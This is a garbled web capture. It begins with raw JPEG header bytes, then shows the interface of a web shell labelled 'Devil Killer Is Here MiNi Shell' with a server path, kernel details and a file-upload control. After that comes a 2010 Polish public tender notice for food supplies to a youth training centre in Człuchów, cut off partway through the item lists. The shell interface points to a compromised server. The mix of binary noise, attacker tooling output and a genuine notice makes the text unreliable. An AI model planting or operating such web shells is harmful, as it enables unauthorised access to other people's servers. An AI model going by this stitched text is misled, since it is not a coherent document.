JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101201/391302-N-2010.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie</b><br>
<b>Numer ogłoszenia: 391302 - 2010; data zamieszczenia: 01.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie od dnia podpisania umowy do dnia 31 grudnia 2011 roku do: Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4. 
      Przedmiotem zamówienia podzielonego na jedenaście zadań częściowych:

Zadanie nr 1 - rośliny uprawne, produkty ogrodnictwa i warzywnictwa
Zadanie nr 2 - jaja kurze
Zadanie nr 3 - ryby
Zadanie nr 4 - mięso i produkty mięsne
Zadanie nr 5 - ryby i przetwory  konserwowe
Zadanie nr 6 - owoce, warzywa i podobne produkty
Zadanie nr 7 - oleje i tłuszcze zwierzęce lub roślinne
Zadanie nr 8 - produkty mleczarskie
Zadanie nr 9 - produkty przemiału ziarna i skrobi
Zadanie nr 10 - różne produkty spożywcze
Zadanie nr 11 - napoje
Zadanie nr 12- pieczywo

2) Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy).
3) Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
4) Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
Cykliczne dostawy  będą realizowane jak następuje:  
5) Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
6) Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
7) Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
8) Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
9) Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia.
10) W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
11) Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
12) Do składania zamówień Zamawiający upoważni wybranego pracownika.
13) Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
14) W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.30.00.00-1, 15.50.00.00-3, 03.14.25.00-3, 03.22.00.00-9, 15.13.11.30-5, 03.21.00.00-6, 15.41.00.00-5, 15.33.11.70-9, 15.33.24.10-1, 15.22.00.00-6, 15.86.00.00-4, 15.87.00.00-7, 03.14.25.00-3, 15.81.00.00-9, 15.00.00.00-8, 15.13.11.10-9, 15.13.11.20-2, 15.10.00.00-9, 15.20.00.00-0, 15.11.90.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
a) Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
b) Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
c) W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT jeszcze nie dokonano.
d) W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2010 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat) 6 piętro:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - rośliny uprawne, produkty ogrodnictwa i warzywnictwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa Grupy	Nazwa	j.m.	ilość	cena netto	wartość netto	% VAT	Wartość brutto
 	Środki żywności	 	 
	Rośliny uprawne, produkty ogrodnictwa i warzywnictwa	
1		ananas		szt.	10				
2		banany		kg 	150				
3		cytryny		kg 	20				
4		pomarańcze	kg 	50				
5		mandarynki	kg 	40				
6		truskawka	kg 	40				
7		gruszki		kg 	40				
8		nektaryna	kg 	40				
9		brzoskwinie 	kg	30				
10		śliwki		kg 	50				
11		czereśnie	kg 	30				
12		winogrona	kg 	80				
13		kiwi		kg	10				
14		arbuz		kg	150				
15		jabłka świeże	kg 	300				
16		ziemniaki jadalne późne	kg 	5500				
17		ziemniaki młode	kg	500				
18		buraki ćwikłowe	kg 	300				
19		marchew		kg 	530				
20		cebula czerwona	kg	10				
21		cebula		kg 	500				
22		czosnek 	kg	3				
23		czosnek		Szt.	30				
24		kapusta młoda	Szt.	180				
25		kapusta biała	kg 	500				
26		kapusta czerwona	kg 	50				
27		pietruszka korzeń	kg 	250				
28		seler		kg 	250				
29		seler naciowa	Szt.	20				
30		groch cały	kg	10				
31		groch łuska 5kg	Szt.	11				
32		fasola 		kg	50				
33		por		kg 	100				
34		por 		Szt.	40				
35		papryka		kg 	60				
36		pomidory	kg 	200				
37		ogórki		kg 	250				
38		sałata		Szt.	150				
39		kapusta pekińskakg 	85				
40		kapusta pekińska w szt	Szt.	35				
41		kapusta włoska	kg	10				
42		kabaczek - cukinia	kg	20				
43		kalafior	Szt.	15				
44		jarmuż		kg	2				
45		rzodkiewka	Szt.	65				
46		natka pietruszki	Szt.	530				
47		koper zielony	Szt.	150				
48		koper zielony duży	Szt.	40				
49		szczypiorek	                Szt.	150				
50		fasolka szparagowa	kg	50				
 	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - jaja kurze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze	szt.	4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	ryby	pstrągi	kg	10    				
2		karpie	        kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		flaki wołowe 900g	Szt.	30				
2		wołowina zrazowa	kg	5				
3		kości wieprzowe		kg	15				
4		porcje rosołowe (korpusy)	kg	700				
5		kurczak świeży		kg	60				
6		uda całe z kurczaka	kg	500				
7		rozbeft wołowy		kg	5				
8		ćwiartki tylne drobiowe	kg	20				
9		filet z piersi z kurczaka	kg	110				
10		wątroba z kurczaka	kg	80				
11		żołądki drobiowe	kg	15				
12		karkówka wieprzowa z/k	kg	15				
13		schab wieprzowy z/k	kg	30				
14		karkówka b/k		kg	150				
15		schab b/k		kg	100				
16		Golonka b/k		kg	20				
17		szynka b/k		kg	30				
18		mięso gulaszowe		kg	15				
19		słonina			kg	10				
20		łopatka wieprzowa b/k	kg	350				
21		polędwica wieprzowa	kg	5				
22		boczek wędzony 		kg	30				
23		boczek świeży		kg	40				
24		wątroba wieprzowa	kg	35				
25		żeberka			kg	40				
26		pasztetowa		kg	30				
27		wątrobianka		kg	10				
28		pasztet zapiekany	kg	15				
29		salceson		kg	10				
30		kaszanka		kg	10				
31		szynka wieprzowa	kg	20				
32		kiełbasa żywiecka lub podobne	kg	160				
33		kiełbasa szynkowa wieprzowa	kg	250				
34		kiełbasa szynkowa drobiowa	kg	250				
35		kabanosy		kg	16				
36		kiełbasa z weka		kg	150				
37		kiełbasa śląska i podobne	kg	70				
38		kiełbasa biała		kg	16				
39		kiełbasa zwyczajna	kg	90				
40		kiełbasa metka		kg	40				
41		parówki			kg	100				
42		serdelki		kg	24				
43		baleron			kg	30				
44		polędwica drobiowa i podobne	kg	150				
45		szynka mielona		kg	60				
46		mortadela		kg	10				
47		mielonka kanapkowa lub podobne	kg	200				
48		przysmak śniadaniowy	kg	55				
49		tyrolska		kg	70				
50		szynka konserwowa	kg	60				
51		kotlet hamburger	kg	16				
52		pasztet w słoiku 0,15 dag	Szt.	18				
53		pasztet puszka 0,15 dag	Szt.	600				
54		turystyczna puszka 0,30 dag	Szt.	100				
55		tyrolska puszka 0,30 dag	Szt.	100				
56		szynka mielona puszka 0,30 dag	Szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.11.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - ryby i przetwory  konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		panga		kg	80				
2		filet z karpia	kg	10				
3		filet z mintaja	kg	20				
4		śledzie solone matjasy	kg	20				
5		paprykarz 300g	Szt.	30				
6		łosoś sałatkowy	Szt.	30				
7		paprykarz 156 g	Szt.	60				
8		szprot w pomidorach	Szt.	30				
9		śledź w pomidorach	Szt.	30				
10		tuńczyk w oleju	Szt.	20				
11		pstrąg wędzony	kg	5				
12		łosoś wędzony	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - owoce, warzywa i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		brukselka paczka 1kg	Szt.	20				
2		brukselka mrożona 2,5 	kg	Szt.	20				
3		marchewka mrożona w 1 	kg	kg	50				
4		marchewka z groszkiem 1 kg	kg	50				
5		warzywa na patelnię 1 	kg	kg	15				
6		barszcz czerwony koncentrat 250 ml	Szt.	50				
7		surówka	kg	5				
8		Oliwki 0,20 dag		Szt.	20				
9		kalafior mrożony	kg	50				
10		mieszanka warzywna 1 kg	kg	50				
11		groszek mrożony 1 kg	kg	10				
12		groszek konserwowy 1 kg	Szt.	60				
13		fasolka konserwowa czerwona 1 kg	Szt.	30				
14		szpinak	Szt.	20				
15		cebulka konserwowa 0,30 dag	Szt.	18				
16		brokuły	kg	15				
17		soczek owocowy 0,33 ml	Szt.	120				
18		truskawka mrożona	kg	10				
19		szczaw konserwowy 1 kg	Szt.	30				
20		kapusta kwaszona biała	kg	220				
21		pieczarka solona	Szt.	10				
22		pieczarki		kg	50				
23		pieczarki konserwowe 0,50 dag	Szt.	40				
24		kukurydza konserwowa 0,25 dag	Szt.	50				
25		ogórki małosolne	kg	30				
26		ogórki konserwowe 0,75 dag	Szt.	60				
27		ogórki kiszone	kg	110				
28		chrzan z żurawiną 160 g	Szt,	20				
29		chrzan tarty 160 g	Szt,	40				
30		seler konserwowy	Szt,	15				
31		papryka konserwowa 0,75 dag	Szt,	40				
32		koncentrat pomidorowy 1 litr	szt.	90				
33		zapiekanka	Szt.,	160				
34		pyzy ziemniaczane z mięsem	kg	100				
35		frytki paczka 1 kg	Szt.,	35				
36		frytki ziemniaczane 1,5 kg	szt.	25				
37		syrop owocowy 6,5l	szt.	45				
38		rodzynki suszone 10 dag 	szt.	20				
39		dżem 7kg		Szt,	24				
40		kompot owocowy		szt	24				
41		brzoskwinia konserwowa	szt	60				
42		ananas konserwowy	szt	96				
43		owoce tropikalne konserwowe	szt	24				
44		sok owocowy 2l		szt	50				
45		śliwki suszone 0,5 kg	op	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - oleje i tłuszcze zwierzęce lub roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		olej uniwersalny 1l	szt.	24				
2		olej 3l			        szt	12				
3		olej 5l			        szt	40				
4		masło roślinne 200g	szt	90				
5		margaryna 500g		szt	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		mleko spożywcze 3,2% tł. 1l. UHT	szt.	800				
2		śmietana zakwaszona 18% tł.	l	130				
3		śmietana 30% tł.	l	20				
4		śmietanka 500g 30% tł.			Szt.	30				
5		śmietanka jednorazowa 10 szt	op	200				
6		jogurt owocowy 1,5%-2,5% tł. 150g	Szt.	1500				
7		jogurt pitny		Szt.	400				
8		Maślanka 1l		Szt.	50				
9		jogurt naturalny 0,5 l	Szt.	100				
10		Kefir 0,30 ml		Szt.	120				
11		Deser 0,30 ml		Szt.	120				
12		serek homogenizowany 0,30 dag	Szt.	500				
13		serek grani	Szt.	150				
14		ser twarogowy 200g	Szt.	50				
15		ser twarogowy półtłusty	kg	30				
16		ser wędzony		kg	15				
17		ser żółty		kg	120				
18		ser feta półtłusty 0,250 g	Szt.	30				
19		ser topiony 0,150 g	Szt.	200				
20		ser topiony 0,150 g	Szt.	880				
21		ser topiony krążek	szt.	100				
22		serek almette		Szt.	200				
23		ser kanapkowy		szt	500				
24		serek kanapkowy 100g	szt	100				
25		Lody na patyku		szt	120				
26		lody 1400 km		szt	30				
27		lody 1000ml		szt	50				
28		lody 900ml		szt	50				
29		masło świeże 200g	szt.	1500				
 	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
